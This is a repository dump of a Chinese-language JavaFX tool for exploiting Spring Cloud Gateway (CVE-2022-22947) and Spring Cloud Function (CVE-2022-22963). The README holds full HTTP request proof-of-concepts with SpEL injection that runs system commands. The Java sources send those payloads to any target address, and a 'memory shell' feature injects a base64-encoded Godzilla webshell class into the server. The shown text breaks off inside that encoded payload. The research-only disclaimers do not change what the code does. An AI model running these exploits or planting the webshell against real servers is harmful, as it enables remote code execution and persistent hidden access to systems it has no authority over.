├── README.md
├── assets
├── image-20230601130120697.png
├── image-20230601130234458.png
├── image-20230601131042060.png
├── image-20230601131127171.png
└── image-20230601134110151.png
├── pom.xml
└── src
└── main
└── java
└── org
└── example
├── CheckHBox.java
├── InfoTab.java
├── MD5Generator.java
├── Main.java
├── MemoryShellTab.java
├── Poc
├── Check.java
├── Function.java
└── Gateway.java
├── VBoxContent.java
└── VulnTab.java
/README.md:
--------------------------------------------------------------------------------
1 | Spring_All_Reachable
2 | 一款针对Spring漏洞框架进行快速利用的图形化工具
3 |
4 |
5 | 
6 | 
7 | 
8 | 
9 | 
10 | 
11 |
12 |
13 |
14 |
15 |
16 |
17 | # 📝 TODO
18 |
19 | * Spring Core RCE
20 | * 支持更多类型内存马
21 | * 支持内存马密码修改
22 |
23 | ........
24 |
25 |
26 |
27 | # :clapper:使用方法
28 |
29 | ### Spring Cloud Gateway命令执行(CVE-2022-22947)
30 |
31 | #### 漏洞描述
32 |
33 | Spring Cloud Gateway存在远程代码执行漏洞,该漏洞是发生在Spring Cloud Gateway应用程序的Actuator端点,其在启用、公开和不安全的情 况下容易受到代码注入的攻击。攻击者可利用该漏洞通过恶意创建允许在远程主机上执行任意远程请求。
34 |
35 |
36 | #### 漏洞影响
37 |
38 | VMWare Spring Cloud GateWay 3.1.0
39 | VMWare Spring Cloud GateWay >=3.0.0,<=3.0.6
40 | VMWare Spring Cloud GateWay <3.0.0
41 |
42 | #### 漏洞poc
43 |
44 | ```
45 | POST /actuator/gateway/routes/hacktest HTTP/1.1
46 | Host: localhost:8080
47 | Accept-Encoding: gzip, deflate
48 | Accept: */*
49 | Accept-Language: en
50 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
51 | Connection: close
52 | Content-Type: application/json
53 | Content-Length: 328
54 |
55 | {
56 | "id": "hacktest",
57 | "filters": [{
58 | "name": "AddResponseHeader",
59 | "args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"}
60 | }],
61 | "uri": "http://example.com",
62 | "order": 0
63 | }
64 | ```
65 |
66 | ```
67 | POST /actuator/gateway/refresh HTTP/1.1
68 | Host: localhost:8080
69 | Accept-Encoding: gzip, deflate
70 | Accept: */*
71 | Accept-Language: en
72 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
73 | Connection: close
74 | Content-Type: application/x-www-form-urlencoded
75 | Content-Length: 0
76 |
77 |
78 | ```
79 |
80 | ```
81 | GET /actuator/gateway/routes/hacktest HTTP/1.1
82 | Host: localhost:8080
83 | Accept-Encoding: gzip, deflate
84 | Accept: */*
85 | Accept-Language: en
86 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
87 | Connection: close
88 | Content-Type: application/x-www-form-urlencoded
89 | Content-Length: 0
90 |
91 |
92 | ```
93 |
94 | ```
95 | DELETE /actuator/gateway/routes/hacktest HTTP/1.1
96 | Host: localhost:8080
97 | Accept-Encoding: gzip, deflate
98 | Accept: */*
99 | Accept-Language: en
100 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
101 | Connection: close
102 |
103 |
104 | ```
105 |
106 | ```
107 | POST /actuator/gateway/refresh HTTP/1.1
108 | Host: localhost:8080
109 | Accept-Encoding: gzip, deflate
110 | Accept: */*
111 | Accept-Language: en
112 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
113 | Connection: close
114 | Content-Type: application/x-www-form-urlencoded
115 | Content-Length: 0
116 |
117 |
118 | ```
119 |
120 | #### 工具使用
121 |
122 | 
123 |
124 | 
125 |
126 | 
127 |
128 |
129 |
130 |
131 |
132 | ### Spring Cloud Function SpEL 远程代码执行 (CVE-2022-22963)
133 |
134 | #### 漏洞描述
135 |
136 | Spring Cloud Function 是Spring cloud中的serverless框架。
137 |
138 | Spring Cloud Function 中的 RoutingFunction 类的 apply 方法将请求头中的“spring.cloud.function.routing-expression”参数作为 Spel 表达式进行处理,造成 Spel 表达式注入漏洞。
139 |
140 | 攻击者可通过该漏洞执行任意代码。
141 |
142 | #### 漏洞影响
143 |
144 | org.springframework.cloud:spring-cloud-function-context(影响版本:3.0.0.RELEASE~3.2.2)
145 |
146 | #### 漏洞poc
147 |
148 | ```
149 | POST /functionRouter HTTP/1.1
150 | Host: localhost:8080
151 | Accept-Encoding: gzip, deflate
152 | Accept: */*
153 | Accept-Language: en
154 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
155 | Connection: close
156 | spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch /tmp/success")
157 | Content-Type: text/plain
158 | Content-Length: 4
159 |
160 | test
161 | ```
162 |
163 | #### 工具使用
164 |
165 | 
166 |
167 | 
168 |
169 |
170 |
171 |
172 |
173 | # :book: 参考项目
174 |
175 | [https://starchart.cc/0x727/SpringBootExploit](https://github.com/0x727/SpringBootExploit)
176 |
177 | [https://github.com/whwlsfb/cve-2022-22947-godzilla-memshell](https://github.com/whwlsfb/cve-2022-22947-godzilla-memshell)
178 |
179 |
180 |
181 |
182 |
183 | # :b:免责声明
184 |
185 | 此工具仅作为网络安全攻防研究交流,请使用者遵照网络安全法合理使用! 如果使用者使用该工具出现非法攻击等违法行为,与本作者无关!
186 |
187 |
188 |
189 | 
190 |
--------------------------------------------------------------------------------
/assets/image-20230601130120697.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/savior-only/Spring_All_Reachable/4013125ee4b373a1127825bca15f410c66511a36/assets/image-20230601130120697.png
--------------------------------------------------------------------------------
/assets/image-20230601130234458.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/savior-only/Spring_All_Reachable/4013125ee4b373a1127825bca15f410c66511a36/assets/image-20230601130234458.png
--------------------------------------------------------------------------------
/assets/image-20230601131042060.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/savior-only/Spring_All_Reachable/4013125ee4b373a1127825bca15f410c66511a36/assets/image-20230601131042060.png
--------------------------------------------------------------------------------
/assets/image-20230601131127171.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/savior-only/Spring_All_Reachable/4013125ee4b373a1127825bca15f410c66511a36/assets/image-20230601131127171.png
--------------------------------------------------------------------------------
/assets/image-20230601134110151.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/savior-only/Spring_All_Reachable/4013125ee4b373a1127825bca15f410c66511a36/assets/image-20230601134110151.png
--------------------------------------------------------------------------------
/pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 | 4.0.0
6 |
7 | org.example
8 | Spring_All_Reachable
9 | 2.0
10 |
11 |
12 | cn.hutool
13 | hutool-all
14 | 5.8.17
15 |
16 |
17 |
18 |
19 | 8
20 | 8
21 |
22 |
23 |
24 |
25 | org.apache.maven.plugins
26 | maven-shade-plugin
27 | 2.4.3
28 |
29 |
30 | package
31 |
32 | shade
33 |
34 |
35 |
36 |
37 | org.example.Main
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
--------------------------------------------------------------------------------
/src/main/java/org/example/CheckHBox.java:
--------------------------------------------------------------------------------
1 | package org.example;
2 |
3 | import javafx.application.Platform;
4 | import javafx.collections.FXCollections;
5 | import javafx.concurrent.Task;
6 | import javafx.geometry.Pos;
7 | import javafx.scene.control.*;
8 | import javafx.scene.layout.HBox;
9 | import javafx.scene.layout.Priority;
10 | import org.example.Poc.*;
11 |
12 | import java.util.function.Function;
13 |
14 | public class CheckHBox extends HBox {
15 |
16 | Check check = new Check();
17 | public TextField textField;
18 | public ComboBox comboBox;
19 |
20 | public CheckHBox(InfoTab infoTab){
21 | super(10);
22 |
23 | Label label = new Label("目标地址");
24 | textField = new TextField("http://127.0.0.01:8080");
25 | String combox_list[] = {
26 | "All",
27 | "Spring Cloud Gateway 命令执行",
28 | "Spring Cloud Function SpEL 远程代码执行漏洞"
29 | };
30 | comboBox = new ComboBox(FXCollections
31 | .observableArrayList(combox_list));
32 | comboBox.setValue("All");
33 | Button button = new Button("检测");
34 | button.setPrefWidth(100);
35 |
36 | //检测按钮触发动作
37 | button.setOnAction(event -> {
38 | //获取comboBox选项
39 | String list = comboBox.getValue();
40 |
41 | //创建task
42 | Task task = new Task() {
43 |
44 | @Override
45 | protected Void call() throws Exception {
46 | switch (list) {
47 | case "Spring Cloud Gateway 命令执行":
48 | checkAndPrint(check::Gateway, textField.getText());
49 | break;
50 | case "Spring Cloud Function SpEL 远程代码执行漏洞":
51 | checkAndPrint(check::Function, textField.getText());
52 | break;
53 | case "All":
54 | //使用了 checkAndPrint() 方法将检测和打印结果的逻辑封装,接受一个 Function 类型的参数和一个字符串类型的输入
55 | checkAndPrint(check::Gateway, textField.getText());
56 | checkAndPrint(check::Function, textField.getText());
57 | break;
58 | default:
59 | break;
60 | }
61 | return null;
62 | }
63 |
64 | // 定义一个检测并打印结果的方法,将输入传输给指定的检测方法进行检
65 | private void checkAndPrint(Function checkMethod, String input) {
66 | T result = checkMethod.apply(input);
67 | if (result != null && !result.toString().isEmpty()) {
68 | Platform.runLater(() -> {
69 | infoTab.appendText((String) result); // 使用 CheckHBox 中的 infoTab 属性
70 | });
71 | }
72 | }
73 | @Override
74 | protected void succeeded() {
75 | super.succeeded();
76 | // 创建一个弹窗
77 | Alert alert = new Alert(Alert.AlertType.INFORMATION);
78 | alert.setTitle("任务完成");
79 | alert.setHeaderText(null);
80 | alert.setContentText("检测已完成!");
81 | alert.showAndWait();
82 | }
83 | };
84 | //创建线程并启动task
85 | Thread thread = new Thread(task);
86 | thread.setDaemon(true);
87 | thread.start();
88 |
89 | // 清空检测结果
90 | infoTab.clear();
91 | });
92 |
93 | this.getChildren().addAll(label, textField, comboBox, button);
94 | this.setAlignment(Pos.CENTER);
95 | this.setHgrow(textField, Priority.ALWAYS);
96 | }
97 |
98 | }
99 |
--------------------------------------------------------------------------------
/src/main/java/org/example/InfoTab.java:
--------------------------------------------------------------------------------
1 | package org.example;
2 |
3 | import javafx.geometry.Insets;
4 | import javafx.geometry.Pos;
5 | import javafx.scene.control.Tab;
6 | import javafx.scene.control.TextArea;
7 | import javafx.scene.layout.Priority;
8 | import javafx.scene.layout.StackPane;
9 | import javafx.scene.layout.VBox;
10 |
11 | public class InfoTab extends Tab {
12 | public TextArea textArea;
13 | private String originalText;
14 |
15 | public InfoTab() {
16 | this.setText("综合信息");
17 |
18 | StackPane root = new StackPane();
19 | VBox vbox = new VBox(20);
20 | textArea =new TextArea("\n\n" +
21 | "[+] Spring Cloud Gateway 命令执行(CVE-2022-22947)\n" +
22 | "[+] Spring Cloud Function SpEL 远程代码执行漏洞(CVE-2022-22963)\n" +
23 | "\n该程序仅用于安全人员本地测试使用!\n" +
24 | "用户滥用造成的一切后果与作者无关!\n" +
25 | "使用者请务必遵守当地法律!\n" +
26 | "本程序不得用于商业用途,仅限学习交流!");
27 | textArea.setWrapText(true);
28 | vbox.getChildren().addAll(textArea);
29 | vbox.setAlignment(Pos.CENTER);
30 | vbox.setVgrow(textArea, Priority.ALWAYS);
31 | vbox.setPadding(new Insets(5));
32 | root.getChildren().addAll(vbox);
33 | this.setContent(vbox);
34 |
35 | // 记录当前区域文本(即原有的默认字符)
36 | originalText = textArea.getText();
37 | }
38 |
39 | public void appendText(String message) {
40 | // 在文本框中添加新信息
41 | textArea.appendText("\n\n" + message);
42 | }
43 |
44 | public void clear() {
45 | // 清空文本框
46 | textArea.clear();
47 | // 重新将原有的默认字符添加回去
48 | textArea.appendText(originalText);
49 | }
50 | }
51 |
--------------------------------------------------------------------------------
/src/main/java/org/example/MD5Generator.java:
--------------------------------------------------------------------------------
1 | package org.example;
2 |
3 | import java.security.MessageDigest;
4 | import java.security.NoSuchAlgorithmException;
5 | import java.util.UUID;
6 |
7 | public class MD5Generator {
8 | public static String generateRandomMD5() {
9 | try {
10 | String randomString = UUID.randomUUID().toString();
11 | MessageDigest md5 = MessageDigest.getInstance("MD5");
12 | md5.update(randomString.getBytes());
13 | byte[] digest = md5.digest();
14 | StringBuffer sb = new StringBuffer();
15 | for (byte b : digest) {
16 | sb.append(String.format("%02x", b & 0xff));
17 | }
18 | return sb.toString();
19 | } catch (NoSuchAlgorithmException e) {
20 | e.printStackTrace();
21 | return null;
22 | }
23 | }
24 | }
25 |
26 |
--------------------------------------------------------------------------------
/src/main/java/org/example/Main.java:
--------------------------------------------------------------------------------
1 | package org.example;
2 |
3 | import javafx.application.Application;
4 | import javafx.scene.Scene;
5 | import javafx.scene.layout.StackPane;
6 | import javafx.stage.Stage;
7 |
8 |
9 | public class Main extends Application {
10 |
11 | @Override
12 | public void start(Stage stage) {
13 |
14 | StackPane root = new StackPane();
15 |
16 | VBoxContent vboxContent = new VBoxContent();
17 |
18 | root.getChildren().addAll(vboxContent);
19 |
20 | Scene scene = new Scene(root, 750, 550);
21 | stage.setScene(scene);
22 | stage.setTitle("Spring漏洞综合利用工具 by SXdysq");
23 | stage.show();
24 |
25 | }
26 | }
--------------------------------------------------------------------------------
/src/main/java/org/example/MemoryShellTab.java:
--------------------------------------------------------------------------------
1 | package org.example;
2 |
3 | import javafx.collections.FXCollections;
4 | import javafx.collections.ObservableList;
5 | import javafx.concurrent.Task;
6 | import javafx.geometry.Insets;
7 | import javafx.geometry.Pos;
8 | import javafx.scene.control.*;
9 | import javafx.scene.layout.HBox;
10 | import javafx.scene.layout.Priority;
11 | import javafx.scene.layout.StackPane;
12 | import javafx.scene.layout.VBox;
13 | import org.example.Poc.Gateway;
14 |
15 | public class MemoryShellTab extends Tab {
16 | CheckHBox checkHBox = new CheckHBox(null);
17 | Gateway gateway = new Gateway(); // 创建Poc实例
18 |
19 | public MemoryShellTab(CheckHBox checkHBox) {
20 | this.setText("内存马");
21 |
22 | StackPane root = new StackPane();
23 | VBox vbox = new VBox(20);
24 | HBox hBox = new HBox(10);
25 | HBox hBox1 = new HBox(10);
26 |
27 | //第一行组件
28 | Label labeltype = new Label("内存马类型");
29 | ObservableList comboBoxList = FXCollections.observableArrayList(
30 | "哥斯拉"
31 | );
32 | ComboBox comboBox = new ComboBox<>(comboBoxList);
33 | comboBox.setValue("哥斯拉");
34 | Label labelpath = new Label("内存马路径");
35 | TextField textField = new TextField("/favicongmem.ico");
36 | Button button = new Button("Let's Go!");
37 | button.setPrefWidth(100);
38 | hBox.getChildren().addAll(labeltype,comboBox,labelpath,textField,button);
39 | hBox.setAlignment(Pos.CENTER);
40 | hBox.setHgrow(textField, Priority.ALWAYS);
41 |
42 | //第二行组件
43 | TextArea textArea =new TextArea();
44 | textArea.setWrapText(true);
45 | hBox1.getChildren().add(textArea);
46 | hBox1.setHgrow(textArea, Priority.ALWAYS);
47 |
48 | //getshell按钮触发动作
49 | button.setOnAction(event -> {
50 | // 获取用户选择的漏洞类型
51 | String list = checkHBox.comboBox.getSelectionModel().getSelectedItem();
52 |
53 | // 创建一个异步任务
54 | Task task = new Task() {
55 | @Override
56 | protected String call() throws Exception {
57 | switch (list) {
58 | case "Spring Cloud Gateway 命令执行":
59 | return gateway.GetShell(checkHBox.textField.getText(), textField.getText());
60 | default:
61 | // 如果漏洞类型不在已知列表中,则返回提示信息
62 | return "暂未实现!";
63 | }
64 | }
65 | };
66 |
67 | // 当异步任务完成时,将检测结果显示到 textArea 中
68 | task.setOnSucceeded(event1 -> textArea.setText(task.getValue()));
69 |
70 | // 创建一个新线程并启动异步任务
71 | Thread thread = new Thread(task);
72 | thread.setDaemon(true); // 将线程设置为守护线程
73 | thread.start();
74 | });
75 |
76 | vbox.getChildren().addAll(hBox,hBox1);
77 | vbox.setAlignment(Pos.CENTER);
78 | vbox.setVgrow(hBox1, Priority.ALWAYS);
79 | vbox.setPadding(new Insets(5));
80 | root.getChildren().addAll(vbox);
81 | this.setContent(root);
82 | }
83 | }
84 |
--------------------------------------------------------------------------------
/src/main/java/org/example/Poc/Check.java:
--------------------------------------------------------------------------------
1 | package org.example.Poc;
2 |
3 | import cn.hutool.core.date.DateUtil;
4 | import org.example.MD5Generator;
5 |
6 | public class Check {
7 |
8 | Gateway gateway = new Gateway();
9 | Function function = new Function();
10 | // private final String randomMD5 = MD5Generator.generateRandomMD5();
11 |
12 |
13 | /**
14 | * Spring Cloud Gateway 命令执行
15 | */
16 | public String Gateway (String host) {
17 | String randomMD5 = MD5Generator.generateRandomMD5();
18 |
19 | // String res = gateway.rce(host, "echo "+randomMD5);
20 | // boolean status = res.contains(randomMD5);
21 | String res = gateway.rce(host, "whoami");
22 | //通过 isEmpty() 方法判断res是否为空
23 | boolean status = res != "漏洞利用失败!" && !res.isEmpty();
24 | return formatResult(status, "Spring Cloud Gateway 命令执行漏洞");
25 | }
26 |
27 | /**
28 | * *Spring Cloud Function SpEL 远程代码执行
29 | */
30 | public String Function (String host) {
31 | String randomMD5 = MD5Generator.generateRandomMD5();
32 |
33 | String res = function.Command(host, "'uppercase'", randomMD5);
34 | boolean status = res.contains(randomMD5.toUpperCase());
35 | return formatResult(status, "Spring Cloud Function SpEL 远程代码执行漏洞");
36 | }
37 |
38 | /**
39 | * 格式化返回结果
40 | */
41 | private String formatResult(boolean status, String message) {
42 | return (status ? "[+] 存在" : "[-] 不存在") + message + " ------ " + DateUtil.now();
43 | }
44 | }
45 |
--------------------------------------------------------------------------------
/src/main/java/org/example/Poc/Function.java:
--------------------------------------------------------------------------------
1 | package org.example.Poc;
2 |
3 | import cn.hutool.core.util.StrUtil;
4 | import cn.hutool.http.Header;
5 | import cn.hutool.http.HttpRequest;
6 | import cn.hutool.http.HttpResponse;
7 | import cn.hutool.http.HttpUtil;
8 |
9 | import java.util.Map;
10 |
11 | public class Function {
12 | public String Command (String host, String usercmd, String randomMD5) {
13 |
14 | String url = host + "/functionRouter";
15 | String payload = null;
16 | if (randomMD5 == null) {
17 | payload = "T(java.lang.Runtime).getRuntime().exec(\"{}\")";
18 | payload = StrUtil.format(payload,usercmd);
19 | }else {
20 | payload = usercmd;
21 | }
22 |
23 |
24 | try {
25 | HttpResponse res = HttpRequest.post(url)
26 | // .setHttpProxy("127.0.0.1",8080)
27 | //移除自带的header请求头Accept
28 | .header("Accept", "")
29 | .header("spring.cloud.function.routing-expression",payload)
30 | .body(randomMD5)
31 | .timeout(60000)//超时,毫秒
32 | .execute();
33 |
34 | String regex = "^(?=.*timestamp)(?=.*path)(?=.*status)(?=.*error)(?=.*requestId).*";
35 | boolean isMatch = res.body().matches(regex);
36 | // System.out.println(isMatch);
37 |
38 | if (res.getStatus() == 500&&isMatch) {
39 | return "[+]无回显,通过Response判断命令执行成功\nResponse:\n" + res.body();
40 |
41 | } else if (res.getStatus() == 200&&res.body().contains(randomMD5.toUpperCase())) {
42 | return res.body();
43 |
44 | } else {
45 |
46 | return "[-]无回显,通过Response判断命令执行失败\nResponse:\n" + res.body();
47 |
48 | }
49 | } catch (Exception e) {
50 | return "请求失败!";
51 | }
52 | }
53 | }
54 |
--------------------------------------------------------------------------------
/src/main/java/org/example/Poc/Gateway.java:
--------------------------------------------------------------------------------
1 | package org.example.Poc;
2 |
3 | import cn.hutool.core.util.RandomUtil;
4 | import cn.hutool.core.util.StrUtil;
5 | import cn.hutool.http.Header;
6 | import cn.hutool.http.HttpRequest;
7 | import cn.hutool.http.HttpResponse;
8 | import cn.hutool.json.JSONObject;
9 | import cn.hutool.json.JSONUtil;
10 | import org.example.MD5Generator;
11 |
12 | public class Gateway {
13 |
14 | //getshell
15 | public String GetShell (String host, String path) {
16 |
17 | String payload = "#{T(org.springframework.cglib.core.ReflectUtils).defineClass('ms.GMemShell',T(org.springframework.util.Base64Utils).decodeFromString('yv66vgAAADQBeAoADQC2BwC3CgACALYJABIAuAoAAgC5CQASALoKAAIAuwoAEgC8CQASAL0KAA0AvggAcgcAvwcAwAcAwQcAwgoADADDCgAOAMQHAMUIAJ8HAMYHAMcKAA8AyAsAyQDKCgASALYKAA4AywgAzAcAzQoAGwDOCADPBwDQBwDRCgDSANMKANIA1AoAHgDVBwDWCACBBwCECQDXANgKANcA2QgA2goA2wDcBwDdCgAVAN4KACoA3woA2wDgCgDbAOEIAOIKAOMA5AoAFQDlCgDjAOYHAOcKAOMA6AoAMwDpCgAzAOoKABUA6wgA7AoADADtCADuCgAMAO8IAPAIAPEKAAwA8ggA8wgA9AgA9QgA9ggA9wsAFAD4EgAAAP4KAP8BAAcBAQkBAgEDCgBHAQQKABsBBQsBBgEHCgASAQgKABIBCQkAEgEKCAELCwEMAQ0KABIBDgsBDAEPCAEQBwERCgBUALYKAA0BEgoAFQETCgANALsKAFQBFAoAEgEVCgAVARYKAP8BFwcBGAoAXQC2CABlCAEZAQAFc3RvcmUBAA9MamF2YS91dGlsL01hcDsBAAlTaWduYXR1cmUBADVMamF2YS91dGlsL01hcDxMamF2YS9sYW5nL1N0cmluZztMamF2YS9sYW5nL09iamVjdDs+OwEABHBhc3MBABJMamF2YS9sYW5nL1N0cmluZzsBAANtZDUBAAJ4YwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAOTG1zL0dNZW1TaGVsbDsBAAhkb0luamVjdAEAOChMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQAVcmVnaXN0ZXJIYW5kbGVyTWV0aG9kAQAaTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAA5leGVjdXRlQ29tbWFuZAEAEnJlcXVlc3RNYXBwaW5nSW5mbwEAQ0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9yZWFjdGl2ZS9yZXN1bHQvbWV0aG9kL1JlcXVlc3RNYXBwaW5nSW5mbzsBAANtc2cBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQADb2JqAQASTGphdmEvbGFuZy9PYmplY3Q7AQAEcGF0aAEADVN0YWNrTWFwVGFibGUHAM0HAMcBABBNZXRob2RQYXJhbWV0ZXJzAQALZGVmaW5lQ2xhc3MBABUoW0IpTGphdmEvbGFuZy9DbGFzczsBAApjbGFzc2J5dGVzAQACW0IBAA51cmxDbGFzc0xvYWRlcgEAGUxqYXZhL25ldC9VUkxDbGFzc0xvYWRlcjsBAAZtZXRob2QBAApFeGNlcHRpb25zAQABeAEAByhbQlopW0IBAAFjAQAVTGphdmF4L2NyeXB0by9DaXBoZXI7AQABcwEAAW0BAAFaBwDFBwEaAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBAB1MamF2YS9zZWN1cml0eS9NZXNzYWdlRGlnZXN0OwEAA3JldAEADGJhc2U2NEVuY29kZQEAFihbQilMamF2YS9sYW5nL1N0cmluZzsBAAdFbmNvZGVyAQAGYmFzZTY0AQARTGphdmEvbGFuZy9DbGFzczsBAAJicwEABXZhbHVlAQAMYmFzZTY0RGVjb2RlAQAWKExqYXZhL2xhbmcvU3RyaW5nOylbQgEAB2RlY29kZXIBAANjbWQBAF0oTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZlci9TZXJ2ZXJXZWJFeGNoYW5nZTspTG9yZy9zcHJpbmdmcmFtZXdvcmsvaHR0cC9SZXNwb25zZUVudGl0eTsBAAxidWZmZXJTdHJlYW0BAAJleAEABXBkYXRhAQAyTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZlci9TZXJ2ZXJXZWJFeGNoYW5nZTsBABlSdW50aW1lVmlzaWJsZUFubm90YXRpb25zAQA1TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2JpbmQvYW5ub3RhdGlvbi9Qb3N0TWFwcGluZzsBAAQvY21kAQANbGFtYmRhJGNtZCQxMQEARyhMb3JnL3NwcmluZ2ZyYW1ld29yay91dGlsL011bHRpVmFsdWVNYXA7KUxyZWFjdG9yL2NvcmUvcHVibGlzaGVyL01vbm87AQAGYXJyT3V0AQAfTGphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtOwEAAWYBAAJpZAEABGRhdGEBAChMb3JnL3NwcmluZ2ZyYW1ld29yay91dGlsL011bHRpVmFsdWVNYXA7AQAGcmVzdWx0AQAZTGphdmEvbGFuZy9TdHJpbmdCdWlsZGVyOwcAtwEACDxjbGluaXQ+AQAKU291cmNlRmlsZQEADkdNZW1TaGVsbC5qYXZhDABpAGoBABdqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcgwAZQBmDAEbARwMAGgAZgwBHQEeDABnAJIMAGcAZgwBHwEgAQAPamF2YS9sYW5nL0NsYXNzAQAQamF2YS9sYW5nL09iamVjdAEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAEAQW9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3JlYWN0aXZlL3Jlc3VsdC9tZXRob2QvUmVxdWVzdE1hcHBpbmdJbmZvDAEhASIMASMBJAEADG1zL0dNZW1TaGVsbAEAMG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZlci9TZXJ2ZXJXZWJFeGNoYW5nZQEAEGphdmEvbGFuZy9TdHJpbmcMASUBKAcBKQwBKgErDAEsAS0BAAJvawEAE2phdmEvbGFuZy9FeGNlcHRpb24MAS4AagEABWVycm9yAQAXamF2YS9uZXQvVVJMQ2xhc3NMb2FkZXIBAAxqYXZhL25ldC9VUkwHAS8MATABMQwBMgEzDABpATQBABVqYXZhL2xhbmcvQ2xhc3NMb2FkZXIHATUMATYAmQwBNwE4AQADQUVTBwEaDAE5AToBAB9qYXZheC9jcnlwdG8vc3BlYy9TZWNyZXRLZXlTcGVjDAE7ATwMAGkBPQwBPgE/DAFAAUEBAANNRDUHAUIMATkBQwwBRAFFDAFGAUcBABRqYXZhL21hdGgvQmlnSW50ZWdlcgwBSAE8DABpAUkMAR0BSgwBSwEeAQAQamF2YS51dGlsLkJhc2U2NAwBTAFNAQAKZ2V0RW5jb2RlcgwBTgEiAQAOZW5jb2RlVG9TdHJpbmcBABZzdW4ubWlzYy5CQVNFNjRFbmNvZGVyDAFPAVABAAZlbmNvZGUBAApnZXREZWNvZGVyAQAGZGVjb2RlAQAWc3VuLm1pc2MuQkFTRTY0RGVjb2RlcgEADGRlY29kZUJ1ZmZlcgwBUQFSAQAQQm9vdHN0cmFwTWV0aG9kcw8GAVMQAVQPBwFVEACpDAFWAVcHAVgMAVkBWgEAJ29yZy9zcHJpbmdmcmFtZXdvcmsvaHR0cC9SZXNwb25zZUVudGl0eQcBWwwBXAFdDABpAV4MAV8BHgcBYAwBYQFUDACcAJ0MAIkAigwAYQBiAQAHcGF5bG9hZAcBYgwBYwFUDACBAIIMAWQBZQEACnBhcmFtZXRlcnMBAB1qYXZhL2lvL0J5dGVBcnJheU91dHB1dFN0cmVhbQwBZgFnDAFoAWkMAWoBPAwAlQCWDAFoAUoMAWsBbAEAEWphdmEvdXRpbC9IYXNoTWFwAQAQM2M2ZTBiOGE5YzE1MjI0YQEAE2phdmF4L2NyeXB0by9DaXBoZXIBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7AQARZ2V0RGVjbGFyZWRNZXRob2QBAEAoTGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQANc2V0QWNjZXNzaWJsZQEABChaKVYBAAVwYXRocwEAB0J1aWxkZXIBAAxJbm5lckNsYXNzZXMBAGAoW0xqYXZhL2xhbmcvU3RyaW5nOylMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvcmVhY3RpdmUvcmVzdWx0L21ldGhvZC9SZXF1ZXN0TWFwcGluZ0luZm8kQnVpbGRlcjsBAElvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9yZWFjdGl2ZS9yZXN1bHQvbWV0aG9kL1JlcXVlc3RNYXBwaW5nSW5mbyRCdWlsZGVyAQAFYnVpbGQBAEUoKUxvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9yZWFjdGl2ZS9yZXN1bHQvbWV0aG9kL1JlcXVlc3RNYXBwaW5nSW5mbzsBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAA9wcmludFN0YWNrVHJhY2UBABBqYXZhL2xhbmcvVGhyZWFkAQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7AQAVZ2V0Q29udGV4dENsYXNzTG9hZGVyAQAZKClMamF2YS9sYW5nL0NsYXNzTG9hZGVyOwEAKShbTGphdmEvbmV0L1VSTDtMamF2YS9sYW5nL0NsYXNzTG9hZGVyOylWAQARamF2YS9sYW5nL0ludGVnZXIBAARUWVBFAQAHdmFsdWVPZgEAFihJKUxqYXZhL2xhbmcvSW50ZWdlcjsBAAtnZXRJbnN0